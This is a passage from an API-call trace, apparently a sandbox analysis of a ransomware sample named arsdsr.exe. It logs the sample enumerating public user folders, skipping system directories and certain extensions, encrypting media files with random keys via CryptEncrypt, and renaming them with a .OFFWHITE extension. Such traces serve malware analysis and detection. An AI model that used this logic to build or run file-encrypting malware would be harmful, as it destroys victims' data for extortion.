lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543f38*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0154.457] GetProcessHeap () returned 0x500000 [0154.457] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0154.458] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.458] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0x927c0, lpOverlapped=0x0) returned 1 [0154.527] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.528] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0x927c0, lpOverlapped=0x0) returned 1 [0154.529] GetProcessHeap () returned 0x500000 [0154.529] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.533] CloseHandle (hObject=0x21c) returned 1 [0154.533] GetProcessHeap () returned 0x500000 [0154.533] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.533] GetProcessHeap () returned 0x500000 [0154.533] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.533] GetProcessHeap () returned 0x500000 [0154.533] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.533] GetProcessHeap () returned 0x500000 [0154.533] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.533] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" [0154.533] lstrcatW (in: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.OFFWHITE") returned="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.OFFWHITE" [0154.534] MoveFileW (lpExistingFileName="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="C:/Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.OFFWHITE" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.offwhite")) returned 1 [0154.534] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x40003e, dwReserved1=0x295e9f0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 0 [0154.534] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0154.534] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0154.535] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Videos", cAlternateFileName="")) returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="...") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="$recycle.bin") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="rsa") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="ntuser.dat") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="programdata") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="appdata") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="program files") returned 1 [0154.535] lstrcmpiW (lpString1="Videos", lpString2="program files (x86)") returned 1 [0154.535] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0154.535] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Videos" | out: lpString1="C:/Users\\Public\\Videos") returned="C:/Users\\Public\\Videos" [0154.535] lstrcatW (in: lpString1="C:/Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:/Users\\Public\\Videos\\") returned="C:/Users\\Public\\Videos\\" [0154.535] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Videos\\" | out: lpString1="C:/Users\\Public\\Videos\\") returned="C:/Users\\Public\\Videos\\" [0154.535] lstrcatW (in: lpString1="C:/Users\\Public\\Videos\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Videos\\*.*") returned="C:/Users\\Public\\Videos\\*.*" [0154.535] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Videos\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0154.535] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0154.535] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0154.536] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0154.536] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0154.536] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0154.536] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0154.536] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Videos\\" | out: lpString1="C:/Users\\Public\\Videos\\") returned="C:/Users\\Public\\Videos\\" [0154.536] lstrcatW (in: lpString1="C:/Users\\Public\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Videos\\desktop.ini") returned="C:/Users\\Public\\Videos\\desktop.ini" [0154.536] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.536] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.536] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0154.536] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0154.536] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0154.536] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0154.536] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0154.536] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0154.537] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0154.537] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0154.537] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2=".") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="..") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="...") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="windows") returned -1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="$recycle.bin") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="rsa") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="ntuser.dat") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="programdata") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="appdata") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="program files") returned 1 [0154.537] lstrcmpiW (lpString1="Sample Videos", lpString2="program files (x86)") returned 1 [0154.537] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Videos\\" | out: lpString1="C:/Users\\Public\\Videos\\") returned="C:/Users\\Public\\Videos\\" [0154.537] lstrcatW (in: lpString1="C:/Users\\Public\\Videos\\", lpString2="Sample Videos" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos") returned="C:/Users\\Public\\Videos\\Sample Videos" [0154.537] lstrcatW (in: lpString1="C:/Users\\Public\\Videos\\Sample Videos", lpString2="\\" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\") returned="C:/Users\\Public\\Videos\\Sample Videos\\" [0154.537] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\") returned="C:/Users\\Public\\Videos\\Sample Videos\\" [0154.537] lstrcatW (in: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\*.*") returned="C:/Users\\Public\\Videos\\Sample Videos\\*.*" [0154.537] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Videos\\Sample Videos\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0154.538] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0154.538] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0154.538] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0154.538] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0154.538] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0154.538] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0154.538] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\") returned="C:/Users\\Public\\Videos\\Sample Videos\\" [0154.538] lstrcatW (in: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned="C:/Users\\Public\\Videos\\Sample Videos\\desktop.ini" [0154.538] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.538] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.538] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0154.538] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0154.538] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0154.538] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0154.538] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0154.538] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0154.539] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0154.539] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0154.539] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="..") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="...") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="windows") returned -1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="$recycle.bin") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="rsa") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="ntuser.dat") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="programdata") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="appdata") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="program files") returned 1 [0154.539] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="program files (x86)") returned 1 [0154.539] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\") returned="C:/Users\\Public\\Videos\\Sample Videos\\" [0154.539] lstrcatW (in: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\", lpString2="Wildlife.wmv" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" [0154.539] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.539] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.539] PathFindExtensionW (pszPath="Wildlife.wmv") returned=".wmv" [0154.539] lstrcmpiW (lpString1=".wmv", lpString2=".exe") returned 1 [0154.539] lstrcmpiW (lpString1=".wmv", lpString2=".log") returned 1 [0154.539] lstrcmpiW (lpString1=".wmv", lpString2=".cab") returned 1 [0154.539] lstrcmpiW (lpString1=".wmv", lpString2=".cmd") returned 1 [0154.539] lstrcmpiW (lpString1=".wmv", lpString2=".com") returned 1 [0154.539] lstrcmpiW (lpString1=".wmv", lpString2=".cpl") returned 1 [0154.539] lstrcmpiW (lpString1=".wmv", lpString2=".ini") returned 1 [0154.539] lstrcmpiW (lpString1=".wmv", lpString2=".dll") returned 1 [0154.540] lstrcmpiW (lpString1=".wmv", lpString2=".url") returned 1 [0154.540] lstrcmpiW (lpString1=".wmv", lpString2=".ttf") returned 1 [0154.540] lstrcmpiW (lpString1=".wmv", lpString2=".mp3") returned 1 [0154.540] lstrcmpiW (lpString1=".wmv", lpString2=".pif") returned 1 [0154.540] lstrcmpiW (lpString1=".wmv", lpString2=".mp4") returned 1 [0154.540] lstrcmpiW (lpString1=".wmv", lpString2=".OFFWHITE") returned 1 [0154.540] lstrcmpiW (lpString1=".wmv", lpString2=".msi") returned 1 [0154.540] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0154.540] GetProcessHeap () returned 0x500000 [0154.540] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543f48 [0154.540] CreateFileW (lpFileName="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0154.540] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=26246026) returned 1 [0154.541] GetProcessHeap () returned 0x500000 [0154.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.541] GetProcessHeap () returned 0x500000 [0154.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.541] GetProcessHeap () returned 0x500000 [0154.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0154.541] GetProcessHeap () returned 0x500000 [0154.541] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0154.541] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.541] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.541] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0154.541] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.541] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.541] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0154.541] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.541] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.542] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0154.542] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.542] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.542] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0154.542] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1907b8a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.542] SetLastError (dwErrCode=0x0) [0154.542] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.545] GetLastError () returned 0x0 [0154.545] GetLastError () returned 0x0 [0154.545] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1907c8a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.545] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.545] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1907d8a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.545] WriteFile (in: hFile=0x21c, lpBuffer=0x543f48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543f48*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0154.545] GetProcessHeap () returned 0x500000 [0154.545] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0154.546] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.546] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0x927c0, lpOverlapped=0x0) returned 1 [0154.619] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.619] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0x927c0, lpOverlapped=0x0) returned 1 [0154.622] GetProcessHeap () returned 0x500000 [0154.622] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.625] CloseHandle (hObject=0x21c) returned 1 [0154.625] GetProcessHeap () returned 0x500000 [0154.625] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.626] GetProcessHeap () returned 0x500000 [0154.626] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.626] GetProcessHeap () returned 0x500000 [0154.626] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.626] GetProcessHeap () returned 0x500000 [0154.626] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.626] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" [0154.626] lstrcatW (in: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.OFFWHITE") returned="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.OFFWHITE" [0154.626] MoveFileW (lpExistingFileName="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="C:/Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.OFFWHITE" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.offwhite")) returned 1 [0154.675] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, 